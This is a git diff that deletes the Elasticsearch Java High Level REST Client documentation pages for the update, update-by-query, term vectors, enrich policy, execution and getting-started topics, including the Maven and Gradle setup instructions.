-===== Inspecting Term Vectors
-If +{response}+ contains a non-null list of term vectors,
-more information about each term vector can be obtained using the following:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-term-vectors]
--------------------------------------------------
-<1> The name of the current field
-<2> Field statistics for the current field - document count
-<3> Field statistics for the current field - sum of total term frequencies
-<4> Field statistics for the current field - sum of document frequencies
-<5> Terms for the current field
-<6> The name of the term
-<7> Term frequency of the term
-<8> Document frequency of the term
-<9> Total term frequency of the term
-<10> Score of the term
-<11> Tokens of the term
-<12> Position of the token
-<13> Start offset of the token
-<14> End offset of the token
-<15> Payload of the token
diff --git a/docs/java-rest/high-level/document/update-by-query.asciidoc b/docs/java-rest/high-level/document/update-by-query.asciidoc
deleted file mode 100644
index 26a6bc362b1..00000000000
--- a/docs/java-rest/high-level/document/update-by-query.asciidoc
+++ /dev/null
@@ -1,148 +0,0 @@
---
-:api: update-by-query
-:request: UpdateByQueryRequest
-:response: UpdateByQueryResponse
---
-
-[id="{upid}-{api}"]
-=== Update By Query API
-
-[id="{upid}-{api}-request"]
-==== Update By Query Request
-
-A +{request}+ can be used to update documents in an index.
-
-It requires an existing index (or a set of indices) on which the update is to
-be performed.
-
-The simplest form of a +{request}+ looks like this:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Creates the +{request}+ on a set of indices.
-
-By default version conflicts abort the +{request}+ process but you can just
-count them instead with:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-conflicts]
--------------------------------------------------
-<1> Set `proceed` on version conflict
-
-You can limit the documents by adding a query.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-query]
--------------------------------------------------
-<1> Only update documents which have the field `user` set to `kimchy`
-
-It’s also possible to limit the number of processed documents by setting `maxDocs`.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-maxDocs]
--------------------------------------------------
-<1> Only update 10 documents
-
-By default +{request}+ uses batches of 1000. You can change the batch size with
-`setBatchSize`.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-scrollSize]
--------------------------------------------------
-<1> Use batches of 100 documents
-
-Update by query can also use the ingest feature by specifying a `pipeline`.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> set pipeline to `my_pipeline` - -+{request}+ also supports a `script` that modifies the document: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-script] --------------------------------------------------- -<1> `setScript` to increment the `likes` field on all documents with user `kimchy`. - -+{request}+ can be parallelized using `sliced-scroll` with `setSlices`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-slices] --------------------------------------------------- -<1> set number of slices to use - -`UpdateByQueryRequest` uses the `scroll` parameter to control how long it keeps the "search context" alive. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scroll] --------------------------------------------------- -<1> set scroll time - -If you provide routing then the routing is copied to the scroll query, limiting the process to the shards that match -that routing value. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> set routing - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the update by query request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling update by query - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Set indices options - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update By Query Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were updated -<5> Number of docs that were deleted -<6> Number of batches that were executed -<7> Number of skipped docs -<8> Number of version conflicts -<9> Number of times request had to retry bulk index operations -<10> Number of times request had to retry search operations -<11> The total time this request has throttled itself not including the current throttle time if it is 
currently sleeping -<12> Remaining delay of any current throttle sleep or 0 if not sleeping -<13> Failures during search phase -<14> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/update.asciidoc b/docs/java-rest/high-level/document/update.asciidoc deleted file mode 100644 index 35300512dfc..00000000000 --- a/docs/java-rest/high-level/document/update.asciidoc +++ /dev/null @@ -1,237 +0,0 @@ --- -:api: update -:request: UpdateRequest -:response: UpdateResponse --- - -[id="{upid}-{api}"] -=== Update API - -[id="{upid}-{api}-request"] -==== Update Request - -An +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -The Update API allows to update an existing document by using a script -or by passing a partial document. - -==== Updates with a script -The script can be provided as an inline script: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-inline-script] --------------------------------------------------- -<1> Script parameters provided as a `Map` of objects -<2> Create an inline script using the `painless` language and the previous parameters -<3> Sets the script to the update request - -Or as a stored script: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-stored-script] --------------------------------------------------- -<1> Reference to a script stored under the name `increment-field` in the `painless` language -<2> Sets the script in the update request - -==== Updates with a partial document -When using updates with a partial document, the partial document will be merged with the -existing document. 
- -The partial document can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-string] --------------------------------------------------- -<1> Partial document source provided as a `String` in JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-map] --------------------------------------------------- -<1> Partial document source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-with-doc-as-xcontent] --------------------------------------------------- -<1> Partial document source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-shortcut] --------------------------------------------------- -<1> Partial document source provided as `Object` key-pairs, which gets converted to -JSON format - -==== Upserts -If the document does not already exist, it is possible to define some content that -will be inserted as a new document using the `upsert` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-upsert] --------------------------------------------------- -<1> Upsert document source provided as a `String` - -Similarly to the partial document updates, the content of the `upsert` document -can be defined using methods that accept `String`, `Map`, `XContentBuilder` or -`Object` key-pairs. 
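To make the interplay of the partial document and the upsert document concrete, here is a small hedged sketch; the index, document id and field values are invented, and execution of the request is covered further below.

["source","java"]
--------------------------------------------------
import java.util.HashMap;
import java.util.Map;

import org.elasticsearch.action.update.UpdateRequest;

public class UpsertSketch {
    static UpdateRequest partialUpdateWithUpsert() {
        Map<String, Object> partialDoc = new HashMap<>();
        partialDoc.put("updated", "2020-01-01");          // merged into the document if it exists

        Map<String, Object> upsertDoc = new HashMap<>();
        upsertDoc.put("created", "2020-01-01");           // indexed as a new document otherwise
        upsertDoc.put("updated", "2020-01-01");

        return new UpdateRequest("posts", "1")            // hypothetical index and document id
                .doc(partialDoc)
                .upsert(upsertDoc);
    }
}
--------------------------------------------------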
- -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a `TimeValue` -<2> Timeout to wait for primary shard to become available as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-retry] --------------------------------------------------- -<1> How many times to retry the update operation if the document to update has -been changed by another operation between the get and indexing phases of the -update operation - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Enable source retrieval, disabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-cas] --------------------------------------------------- -<1> ifSeqNo -<2> ifPrimaryTerm - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-detect-noop] --------------------------------------------------- -<1> Disable the noop detection - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scripted-upsert] --------------------------------------------------- -<1> Indicate that the script must run regardless of whether the document exists or not, -ie the script takes care of creating the document if it does not already exist. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-doc-upsert] --------------------------------------------------- -<1> Indicate that the partial document must be used as the upsert document if it -does not exist yet. 
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-active-shards]
--------------------------------------------------
-<1> Sets the number of shard copies that must be active before proceeding with
-the update operation.
-<2> Number of shard copies provided as an `ActiveShardCount`: can be `ActiveShardCount.ALL`,
-`ActiveShardCount.ONE` or `ActiveShardCount.DEFAULT` (default)
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Update Response
-
-The returned +{response}+ allows you to retrieve information about the executed
-operation as follows:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> Handle the case where the document was created for the first time (upsert)
-<2> Handle the case where the document was updated
-<3> Handle the case where the document was deleted
-<4> Handle the case where the document was not impacted by the update,
-i.e. no operation (noop) was executed on the document
-
-When source retrieval is enabled in the `UpdateRequest`
-through the `fetchSource` method, the response contains the
-source of the updated document:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-getresult]
--------------------------------------------------
-<1> Retrieve the updated document as a `GetResult`
-<2> Retrieve the source of the updated document as a `String`
-<3> Retrieve the source of the updated document as a `Map`
-<4> Retrieve the source of the updated document as a `byte[]`
-<5> Handle the scenario where the source of the document is not present in
-the response (this is the case by default)
-
-It is also possible to check for shard failures:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-failure]
--------------------------------------------------
-<1> Handle the situation where the number of successful shards is less than
-the total number of shards
-<2> Handle the potential failures
-
-When an `UpdateRequest` is performed against a document that does not exist,
-the response has a `404` status code and an `ElasticsearchException` is thrown,
-which needs to be handled as follows:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-docnotfound]
--------------------------------------------------
-<1> Handle the exception thrown because the document does not exist
-
-If there is a version conflict, an `ElasticsearchException` will
-be thrown:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-conflict]
--------------------------------------------------
-<1> The raised exception indicates that a version conflict error was returned.
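The response and failure handling described above can be combined into one flow. The following is a non-authoritative sketch that assumes the `client` and `request` objects from the previous sections:

["source","java"]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.ElasticsearchException;
import org.elasticsearch.action.DocWriteResponse;
import org.elasticsearch.action.update.UpdateRequest;
import org.elasticsearch.action.update.UpdateResponse;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.rest.RestStatus;

public class UpdateResponseSketch {
    static void updateAndHandle(RestHighLevelClient client, UpdateRequest request) throws IOException {
        try {
            UpdateResponse response = client.update(request, RequestOptions.DEFAULT);
            if (response.getResult() == DocWriteResponse.Result.CREATED) {
                // the upsert document was indexed for the first time
            } else if (response.getResult() == DocWriteResponse.Result.UPDATED) {
                // an existing document was updated
            } else if (response.getResult() == DocWriteResponse.Result.NOOP) {
                // noop detection kicked in and nothing changed
            }
        } catch (ElasticsearchException e) {
            if (e.status() == RestStatus.NOT_FOUND) {
                // the document to update does not exist
            } else if (e.status() == RestStatus.CONFLICT) {
                // a concurrent change caused a version conflict
            } else {
                throw e;
            }
        }
    }
}
--------------------------------------------------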
diff --git a/docs/java-rest/high-level/enrich/delete_policy.asciidoc b/docs/java-rest/high-level/enrich/delete_policy.asciidoc deleted file mode 100644 index 9bee686cce0..00000000000 --- a/docs/java-rest/high-level/enrich/delete_policy.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: enrich-delete-policy -:request: DeletePolicyRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Policy API deletes an enrich policy from Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete policy request was acknowledged. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether delete policy request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/execute_policy.asciidoc b/docs/java-rest/high-level/enrich/execute_policy.asciidoc deleted file mode 100644 index 59594f1b741..00000000000 --- a/docs/java-rest/high-level/enrich/execute_policy.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ --- -:api: enrich-execute-policy -:request: ExecutePolicyRequest -:response: ExecutePolicyResponse --- - -[id="{upid}-{api}"] -=== Execute Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Execute Policy API allows to execute an enrich policy by name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes either the status or task id. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/get_policy.asciidoc b/docs/java-rest/high-level/enrich/get_policy.asciidoc deleted file mode 100644 index 401a78ccca6..00000000000 --- a/docs/java-rest/high-level/enrich/get_policy.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: enrich-get-policy -:request: GetPolicyRequest -:response: GetPolicyResponse --- - -[id="{upid}-{api}"] -=== Get Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Get Policy API allows to retrieve enrich policies by name -or all policies if no name is provided. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes the requested enrich policy. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The actual enrich policy. 
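Taken together, the enrich policy APIs above are all reached through `client.enrich()`. The sketch below strings them together under that assumption; the policy name is invented and the calls are only meant to show the shape of the API, not a tested example.

["source","java"]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.core.AcknowledgedResponse;
import org.elasticsearch.client.enrich.DeletePolicyRequest;
import org.elasticsearch.client.enrich.ExecutePolicyRequest;
import org.elasticsearch.client.enrich.GetPolicyRequest;
import org.elasticsearch.client.enrich.GetPolicyResponse;

public class EnrichSketch {
    static void runAndRemovePolicy(RestHighLevelClient client) throws IOException {
        // Execute an existing policy so its enrich index is (re)built
        client.enrich().executePolicy(new ExecutePolicyRequest("users-policy"), RequestOptions.DEFAULT);

        // Fetch the policy definition back by name
        GetPolicyResponse policies =
                client.enrich().getPolicy(new GetPolicyRequest("users-policy"), RequestOptions.DEFAULT);

        // Delete the policy once it is no longer needed
        AcknowledgedResponse deleted =
                client.enrich().deletePolicy(new DeletePolicyRequest("users-policy"), RequestOptions.DEFAULT);
    }
}
--------------------------------------------------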
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/put_policy.asciidoc b/docs/java-rest/high-level/enrich/put_policy.asciidoc deleted file mode 100644 index b8e9475bed1..00000000000 --- a/docs/java-rest/high-level/enrich/put_policy.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: enrich-put-policy -:request: PutPolicyRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Put Policy API - -[id="{upid}-{api}-request"] -==== Request - -The Put Policy API stores an enrich policy in Elasticsearch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put policy request was acknowledged. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether put policy request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/enrich/stats.asciidoc b/docs/java-rest/high-level/enrich/stats.asciidoc deleted file mode 100644 index 1d4ae50238a..00000000000 --- a/docs/java-rest/high-level/enrich/stats.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: enrich-stats -:request: StatsRequest -:response: StatsResponse --- - -[id="{upid}-{api}"] -=== Stats API - -[id="{upid}-{api}-request"] -==== Request - -The stats API returns enrich related stats. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes enrich related stats. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> List of policies that are currently executing with - additional details. -<2> List of coordinator stats per ingest node. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/execution-no-req.asciidoc b/docs/java-rest/high-level/execution-no-req.asciidoc deleted file mode 100644 index e9a2780d1bc..00000000000 --- a/docs/java-rest/high-level/execution-no-req.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -//// -This file is included by high level rest client API documentation pages -where the client method does not use a request object. -For methods with requests, see execution.asciidoc -//// - -[id="{upid}-{api}-sync"] -==== Synchronous execution - -When executing the +{api}+ API in the following manner, the client waits -for the +{response}+ to be returned before continuing with code execution: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -Synchronous calls may throw an `IOException` in case of either failing to -parse the REST response in the high-level REST client, the request times out -or similar cases where there is no response coming back from the server. 
- -In cases where the server returns a `4xx` or `5xx` error code, the high-level -client tries to parse the response body error details instead and then throws -a generic `ElasticsearchException` and adds the original `ResponseException` as a -suppressed exception to it. - -[id="{upid}-{api}-async"] -==== Asynchronous execution - -The +{api}+ API can also be called in an asynchronous fashion so that -the client can return directly. Users need to specify how the response or -potential failures will be handled by passing a listener to the -asynchronous {api} method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The `RequestOptions` and `ActionListener` to use when the execution - completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. Failure scenarios and expected exceptions are the same as in the -synchronous execution case. - -A typical listener for +{api}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the +{api}+ call fails. diff --git a/docs/java-rest/high-level/execution.asciidoc b/docs/java-rest/high-level/execution.asciidoc deleted file mode 100644 index cbc44a24f6c..00000000000 --- a/docs/java-rest/high-level/execution.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -//// -This file is included by every high level rest client API documentation page -so we don't have to copy and paste the same asciidoc over and over again. We -*do* have to copy and paste the same Java tests over and over again. For now -this is intentional because it forces us to *write* and execute the tests -which, while a bit ceremonial, does force us to cover these calls in *some* -test. -//// - -[id="{upid}-{api}-sync"] -==== Synchronous execution - -When executing a +{request}+ in the following manner, the client waits -for the +{response}+ to be returned before continuing with code execution: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -Synchronous calls may throw an `IOException` in case of either failing to -parse the REST response in the high-level REST client, the request times out -or similar cases where there is no response coming back from the server. - -In cases where the server returns a `4xx` or `5xx` error code, the high-level -client tries to parse the response body error details instead and then throws -a generic `ElasticsearchException` and adds the original `ResponseException` as a -suppressed exception to it. - -[id="{upid}-{api}-async"] -==== Asynchronous execution - -Executing a +{request}+ can also be done in an asynchronous fashion so that -the client can return directly. 
Users need to specify how the response or -potential failures will be handled by passing the request and a listener to the -asynchronous {api} method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. Failure scenarios and expected exceptions are the same as in the -synchronous execution case. - -A typical listener for +{api}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole +{request}+ fails. diff --git a/docs/java-rest/high-level/getting-started.asciidoc b/docs/java-rest/high-level/getting-started.asciidoc deleted file mode 100644 index 226bcd0492a..00000000000 --- a/docs/java-rest/high-level/getting-started.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[[java-rest-high-getting-started]] -== Getting started - -This section describes how to get started with the high-level REST client from -getting the artifact to using it in an application. - -[[java-rest-high-compatibility]] -=== Compatibility -The Java High Level REST Client requires at least Java 1.8 and depends on the Elasticsearch -core project. The client version is the same as the Elasticsearch version that the -client was developed for. It accepts the same request arguments as the `TransportClient` -and returns the same response objects. See the <> -if you need to migrate an application from `TransportClient` to the new REST client. - -The High Level Client is guaranteed to be able to communicate with any Elasticsearch -node running on the same major version and greater or equal minor version. It -doesn't need to be in the same minor version as the Elasticsearch nodes it -communicates with, as it is forward compatible meaning that it supports -communicating with later versions of Elasticsearch than the one it was developed for. - -The 6.0 client is able to communicate with any 6.x Elasticsearch node, while the 6.1 -client is for sure able to communicate with 6.1, 6.2 and any later 6.x version, but -there may be incompatibility issues when communicating with a previous Elasticsearch -node version, for instance between 6.1 and 6.0, in case the 6.1 client supports new -request body fields for some APIs that are not known by the 6.0 node(s). - -It is recommended to upgrade the High Level Client when upgrading the Elasticsearch -cluster to a new major version, as REST API breaking changes may cause unexpected -results depending on the node that is hit by the request, and newly added APIs will -only be supported by the newer version of the client. The client should always be -updated last, once all of the nodes in the cluster have been upgraded to the new -major version. - -[[java-rest-high-javadoc]] -=== Javadoc - -The javadoc for the REST high level client can be found at {rest-high-level-client-javadoc}/index.html. 
- -[[java-rest-high-getting-started-maven]] -=== Maven Repository - -The high-level Java REST client is hosted on -https://search.maven.org/search?q=g:org.elasticsearch.client[Maven -Central]. The minimum Java version required is `1.8`. - -The High Level REST Client is subject to the same release cycle as -Elasticsearch. Replace the version with the desired client version. - -If you are looking for a SNAPSHOT version, you should add our snapshot repository to your Maven config: - -["source","xml",subs="attributes"] --------------------------------------------------- - - - es-snapshots - elasticsearch snapshot repo - https://snapshots.elastic.co/maven/ - - --------------------------------------------------- - -or in Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { - url "https://snapshots.elastic.co/maven/" -} --------------------------------------------------- - -[[java-rest-high-getting-started-maven-maven]] -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. -Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-high-level-client - {version} - --------------------------------------------------- - -[[java-rest-high-getting-started-maven-gradle]] -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-high-level-client:{version}' -} --------------------------------------------------- - -[[java-rest-high-getting-started-maven-lucene]] -==== Lucene Snapshot repository - -The very first releases of any major version (like a beta), might have been built on top of a Lucene Snapshot version. -In such a case you will be unable to resolve the Lucene dependencies of the client. - -For example, if you want to use the `7.0.0-beta1` version which depends on Lucene `8.0.0-snapshot-83f9835`, you must -define the following repository. 
- -For Maven: - -["source","xml",subs="attributes"] --------------------------------------------------- - - elastic-lucene-snapshots - Elastic Lucene Snapshots - https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/83f9835 - true - false - --------------------------------------------------- - -For Gradle: - -["source","groovy",subs="attributes"] --------------------------------------------------- -maven { - name 'lucene-snapshots' - url 'https://s3.amazonaws.com/download.elasticsearch.org/lucenesnapshots/83f9835' -} --------------------------------------------------- - -[[java-rest-high-getting-started-dependencies]] -=== Dependencies - -The High Level Java REST Client depends on the following artifacts and their -transitive dependencies: - -- org.elasticsearch.client:elasticsearch-rest-client -- org.elasticsearch:elasticsearch - - -[[java-rest-high-getting-started-initialization]] -=== Initialization - -A `RestHighLevelClient` instance needs a <> -to be built as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-init] --------------------------------------------------- - -The high-level client will internally create the low-level client used to -perform requests based on the provided builder. That low-level client -maintains a pool of connections and starts some threads so you should -close the high-level client when you are well and truly done with -it and it will in turn close the internal low-level client to free those -resources. This can be done through the `close`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-close] --------------------------------------------------- - -In the rest of this documentation about the Java High Level Client, the `RestHighLevelClient` instance -will be referenced as `client`. - -[[java-rest-high-getting-started-request-options]] -=== RequestOptions - -All APIs in the `RestHighLevelClient` accept a `RequestOptions` which you can -use to customize the request in ways that won't change how Elasticsearch -executes the request. For example, this is the place where you'd specify a -`NodeSelector` to control which node receives the request. See the -<> for -more examples of customizing the options. - -[[java-rest-high-getting-started-asynchronous-usage]] -=== Asynchronous usage - -All of the methods across the different clients exist in a traditional synchronous and -asynchronous variant. The difference is that the asynchronous ones use asynchronous requests -in the REST Low Level Client. This is useful if you are doing multiple requests or are using e.g. -rx java, Kotlin co-routines, or similar frameworks. - -The asynchronous methods are recognizable by the fact that they have the word "Async" in their name -and return a `Cancellable` instance. The asynchronous methods accept the same request object -as the synchronous variant and accept a generic `ActionListener` where `T` is the return -type of the synchronous method. - -All asynchronous methods return a `Cancellable` object with a `cancel` method that you may call -in case you want to abort the request. Cancelling -no longer needed requests is a good way to avoid putting unnecessary -load on Elasticsearch. 
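As a hedged example of the pattern (the index and document id are invented, and a `RestHighLevelClient` named `client` is assumed to exist), an asynchronous call returns a `Cancellable` handle that can later be used to abort the request:

["source","java"]
--------------------------------------------------
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.get.GetRequest;
import org.elasticsearch.action.get.GetResponse;
import org.elasticsearch.client.Cancellable;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;

public class CancellableSketch {
    static Cancellable fetchAsync(RestHighLevelClient client) {
        GetRequest request = new GetRequest("posts", "1"); // hypothetical index and document id
        Cancellable cancellable = client.getAsync(request, RequestOptions.DEFAULT,
                new ActionListener<GetResponse>() {
                    @Override
                    public void onResponse(GetResponse response) {
                        // handle the document
                    }

                    @Override
                    public void onFailure(Exception e) {
                        // handle the failure
                    }
                });
        // cancellable.cancel() can be called if the result is no longer needed
        return cancellable;
    }
}
--------------------------------------------------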
